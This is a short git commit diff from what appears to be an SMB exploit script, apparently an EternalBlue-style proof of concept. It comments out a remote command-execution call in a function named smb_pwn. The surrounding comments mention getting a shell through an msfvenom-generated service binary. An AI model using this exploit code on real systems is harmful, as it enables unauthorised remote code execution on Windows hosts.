comment out service_exec
This commit is contained in:
@@ -967,7 +967,7 @@ def smb_pwn(conn, arch):
|
||||
smbConn.disconnectTree(tid2)
|
||||
|
||||
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
|
||||
service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
|
||||
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
|
||||
# Note: there are many methods to get shell over SMB admin session
|
||||
# a simple method to get shell (but easily to be detected by AV) is
|
||||
# executing binary generated by "msfvenom -f exe-service ..."
|
||||
|
||||
Reference in New Issue
Block a user